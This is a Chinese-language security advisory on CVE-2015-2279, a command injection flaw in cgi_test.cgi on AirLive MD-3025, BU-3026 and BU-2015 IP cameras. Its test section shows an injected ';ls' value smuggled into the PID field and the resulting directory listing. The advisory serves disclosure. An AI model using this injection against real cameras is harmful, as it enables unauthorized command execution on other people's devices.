AirLive IP监视器命令注入漏洞(CVE-2015-2279)
AirLive IP监视器命令注入漏洞(CVE-2015-2279)
AirLive IP监视器命令注入漏洞(CVE-2015-2279)
发布日期:2015-07-08
更新日期:2015-07-10
受影响系统:
Airlive IP Cameras MD-3025
Airlive IP Cameras BU-3026
Airlive IP Cameras BU-2015
描述:
CVE(CAN) ID: CVE-2015-2279
Airlive是IP监控网络解决方案提供商、安全产品厂商。
AirLive MD-3025, BU-3026, BU-2015相机在处理某些参数时,cgi_test.cgi二进制文件中存在OS命令注入漏洞,攻击者通过向该文件发送构造的请求,利用此漏洞可注入任意命令。
<*来源:Core Security
链接:http://www.securityfocus.com/archive/1/535938
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-c => set system MAC address
-m [MAC] => write MAC address
-n [Model Name] => write Model Name
-h [HW Version] => write HW Version
-v [Firmware Version] => write Firmware Version
-s [SN] => write SN
-t [TAN] => write TAN
-d [PID] => write PID
-r [CR] => write Country Region
-p => show current info.
Content-type: text/html
< body>WRITE_TAN OK, PID=;ls&ls%20-
</body></html>3g.htm
485.htm
SStreamVideo.cab
ado.htm
cfgupgrade.cgi
cgi_test.cgi
client.htm
default.htm
default_else.htm
default_ie.htm
default_m.htm
default_nets.htm
[...]
建议:
厂商补丁:
Airlive
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.airlivesecurity.com/
[1] http://www.airlive.com.
[2] http://www.airlive.com/product/BU-2015.
[3] http://www.airlive.com/product/MD-3025.
[4] http://www.airlive.com/product/BU-3026.
[5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf.
[6] http://www.airlivesecurity.com/product.php?id=5#.
本文永久更新链接地址:
评论暂时关闭